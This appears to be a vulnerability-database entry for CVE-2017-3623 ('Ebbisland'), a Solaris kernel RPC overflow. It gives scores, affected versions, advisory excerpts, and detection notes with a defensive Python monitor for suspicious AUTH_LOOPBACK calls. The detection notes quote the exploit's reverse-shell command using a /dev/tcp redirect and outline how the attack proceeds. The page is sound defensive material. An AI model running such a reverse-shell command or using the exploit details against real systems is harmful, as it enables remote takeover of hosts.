CVE-2017-3623
Published 2017-04-24
Priority P1 · 85 · Critical · CVSS 3.0 base score 10
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Flags: ITW · EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 21.80% (97.3rd percentile)
Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC). For supported versions that are affected see note. Easily "exploitable" vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Solaris. While the vulnerability is in Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Solaris. Note: CVE-2017-3623 is assigned for "Ebbisland". Solaris 10 systems which have had any Kernel patch installed after, or updated via patching tools since 2012-01-26 are not impacted. Also, any Solaris 10 system installed with Solaris 10 1/13 (Solaris 10 Update 11) are not vulnerable. Solaris 11 is not impacted by this issue. CVSS 3.0 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle_corporation | solaris_operating_system | — | — |
Detection & IOCs (extracted from sources)
- Detect RPC CALL packets using the AUTH_LOOPBACK credential flavor (0x55de) arriving from external/non-loopback sources; this is the credential type the exploit uses to trigger the kernel RPC buffer overflow.
- Alert on RPC NULL procedure calls (proc=0) to RPC program 100024 (status service) over TCP that are immediately followed by a second connection carrying an oversized AUTH_LOOPBACK credential; the exploit first "pings", then attacks.
- Look for reverse-shell activity: bash spawned with a `-c` argument containing a /dev/tcp redirect, as the shellcode executes `bash -i >& /dev/tcp/<lhost>/<lport> 0>&1`.
- Solaris 10 systems that have NOT had any Kernel patch installed after 2012-01-26 and are NOT running Solaris 10 1/13 (Update 11) are vulnerable; Solaris 11 is not affected. Scope asset inventory accordingly.
- If an RPC service crashes repeatedly after receiving oversized AUTH_LOOPBACK credential packets, inetd may disable it automatically; monitor for unexpected RPC service restarts or disablement as a post-exploitation indicator.
- The exploit targets IBM AIX PPC in addition to Solaris; the CVE was originally assigned for Solaris, but the exploit code demonstrates applicability to AIX versions 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, and 7200-01-01-1642.
- The exploit requires the attacker to supply correct gid_base, execl_func, and execl_toc values specific to the target system, meaning exploitation is target-architecture-dependent and not fully generic without reconnaissance.
- The exploit shellcode requires /usr/bin/bash to be present on the target system.
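As a worked illustration of the first two detection notes above, the following Python is an added example, not code from this page or from any of the cited sources. It strips the TCP record marks, parses the ONC RPC CALL header as laid out in RFC 5531, and raises an alert on three conditions: the AUTH_LOOPBACK flavor (0x55de, taken from the note above) arriving from a non-loopback address, a credential body longer than RFC 5531's MAX_AUTH_BYTES limit of 400, and a NULL call to program 100024 followed by an AUTH_LOOPBACK call from the same source. The sample records, the program version 1, and the source address 203.0.113.7 are constructed for the demo; the `RpcCallMonitor` class and the use of 400 bytes as the "oversized" cutoff are my assumptions, not thresholds stated by the page.

```python
import struct
import ipaddress

# Constants. AUTH_LOOPBACK's value is the one given in the detection note;
# the rest are from RFC 5531 (ONC RPC version 2).
AUTH_LOOPBACK = 0x55DE
AUTH_NONE = 0
RPC_CALL = 0
RPC_VERSION = 2
MAX_AUTH_BYTES = 400          # RFC 5531 upper bound on an opaque_auth body (assumed alert cutoff)
PROG_STATUS = 100024          # status service program number from the note above
PROC_NULL = 0
LAST_FRAGMENT = 0x80000000    # TCP record-marking "last fragment" bit


def split_records(stream):
    """Split a TCP byte stream into RPC record payloads, record marks removed."""
    records, offset, current = [], 0, b""
    while offset + 4 <= len(stream):
        mark, = struct.unpack(">I", stream[offset:offset + 4])
        length = mark & 0x7FFFFFFF
        fragment = stream[offset + 4:offset + 4 + length]
        if len(fragment) < length:
            break                               # truncated record: stop parsing
        current += fragment
        offset += 4 + length
        if mark & LAST_FRAGMENT:
            records.append(current)
            current = b""
    return records


def parse_rpc_call(payload):
    """Parse the fixed header of one ONC RPC CALL message; None if malformed."""
    if len(payload) < 32:
        return None
    (xid, msg_type, rpcvers, prog, vers, proc,
     cred_flavor, cred_len) = struct.unpack(">8I", payload[:32])
    if msg_type != RPC_CALL or rpcvers != RPC_VERSION:
        return None
    return {"xid": xid, "prog": prog, "vers": vers, "proc": proc,
            "cred_flavor": cred_flavor, "cred_len": cred_len,
            "bytes_after_header": len(payload) - 32}


class RpcCallMonitor:
    """Stateful check over RPC CALLs (hypothetical name); remembers NULL pings per source."""

    def __init__(self):
        self.pinged = set()

    def assess(self, src_ip, payload):
        alerts = []
        call = parse_rpc_call(payload)
        if call is None:
            return alerts
        external = not ipaddress.ip_address(src_ip).is_loopback
        if call["cred_flavor"] == AUTH_LOOPBACK and external:
            alerts.append("AUTH_LOOPBACK credential from non-loopback source %s" % src_ip)
        if call["cred_len"] > MAX_AUTH_BYTES:
            alerts.append("oversized credential: %d bytes (max %d)"
                          % (call["cred_len"], MAX_AUTH_BYTES))
        # Sequence check: a prior NULL ping to 100024, now an AUTH_LOOPBACK call.
        if call["cred_flavor"] == AUTH_LOOPBACK and src_ip in self.pinged:
            alerts.append("NULL call to program 100024 followed by AUTH_LOOPBACK call from %s" % src_ip)
        if (call["prog"] == PROG_STATUS and call["proc"] == PROC_NULL
                and call["cred_flavor"] != AUTH_LOOPBACK):
            self.pinged.add(src_ip)
        return alerts


def build_call(xid, prog, vers, proc, cred_flavor, cred_body):
    """Build a constructed RPC CALL record (with TCP record mark) for the demo."""
    padded = cred_body + b"\x00" * (-len(cred_body) % 4)   # XDR pads opaque data to 4 bytes
    body = struct.pack(">8I", xid, RPC_CALL, RPC_VERSION, prog, vers, proc,
                       cred_flavor, len(cred_body))
    body += padded + struct.pack(">II", AUTH_NONE, 0)       # null verifier
    return struct.pack(">I", LAST_FRAGMENT | len(body)) + body


def demo():
    """Constructed sequence: a NULL ping, then a large AUTH_LOOPBACK call, same source."""
    monitor = RpcCallMonitor()
    ping = build_call(1, PROG_STATUS, 1, PROC_NULL, AUTH_NONE, b"")
    attack = build_call(2, PROG_STATUS, 1, PROC_NULL, AUTH_LOOPBACK, b"A" * 1200)
    results = []
    for stream in (ping, attack):
        for record in split_records(stream):
            results.append(monitor.assess("203.0.113.7", record))
    return results


if __name__ == "__main__":
    for alerts in demo():
        print(alerts)
```

The ping record produces no alert on its own; the second record trips all three checks. The same `assess` call applied to an AUTH_LOOPBACK credential of normal size from 127.0.0.1 stays silent, which matters because AUTH_LOOPBACK is a legitimate flavor for local callers and the first note only asks for the non-loopback case.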
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | v3.0 | 10.0 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| NVD | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 10.0 | CRITICAL | — |
GHSA
GHSA-79mg-vr9v-4r75: Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Kernel RPC)
ghsa_unreviewed · 2022-05-13 · CVSS 10.0 (CRITICAL)
VulnCheck
Oracle Sun Systems Products Suite Solaris Kernel RPC Vulnerability
vulncheck · 2017 · CVSS 10.0 (CRITICAL)
No detection rules found.
Checkpoint
BROKERS IN THE SHADOWS: Analyzing vulnerabilities and attacks spawned by the leaked NSA hacking tools
blogs_checkpoint · 2017-05-25 · tagged CVE-2017-0144
Background
Rarely does the release of an exploit have such a large impact across the
Qualys
Oracle Plugs Struts and Shadow Brokers hole along with 299 Total Vulnerabilities
blogs_qualys · 2017-04-18 · CVSS 7.8 (HIGH)
Today Oracle released a total of 299 new security fixes across all product families. It is important to note that it fixed 25 instances of the infamous Apache Struts vulnerability, which could allow a remote attacker to take complete control of the server running Struts. The Struts fix was applied to 19 instances of Oracle Financial Services Applications along with WebCenter, WebLogic, Siebel, Oracle Communications, MySQL and Oracle Retail.
Oracle also released Patch 25878798 for Solaris 10 and 11.3, which fixed the second Shadow Brokers EXTREMEPARR vulnerability CVE-2017-3622. EXTREMEPARR has a CVSS Base Score of 7.8 and, if successfully exploited, allows a local privilege escalation in the 'dtappgather' component. The other Shadow Brokers vulnerability CVE-2017-3623 (a.k.a. "Ebbisland" or
References
- http://packetstormsecurity.com/files/155876/EBBISLAND-EBBSHAVE-6100-09-04-1441-Remote-Buffer-Overflow.html
- http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
- http://www.securityfocus.com/bid/97778
- http://www.securitytracker.com/id/1038292